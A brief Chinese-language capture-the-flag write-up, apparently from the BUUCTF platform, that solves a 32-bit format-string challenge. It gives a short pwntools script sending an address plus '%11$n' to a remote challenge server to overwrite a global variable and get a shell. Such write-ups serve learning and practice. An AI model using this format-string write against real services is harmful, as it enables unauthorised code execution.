一道格式化字符串的题目
    image.png
    有canary保护
    buf那里很明显的格式化字符串漏洞。
    只要x=4就能getshell
    没有pie 查看x的地址
    image.png
    x等于3
    所以要改为4,32位程序,所以wp如下

    1. from pwn import *
    2. io =remote('node4.buuoj.cn',26411)
    3. x_addr =0x0804A02C
    4. payload = p32(x_addr)+'%11$n'
    5. io.sendline(payload)
    6. io.interactive()

    写道水题吧嘿嘿嘿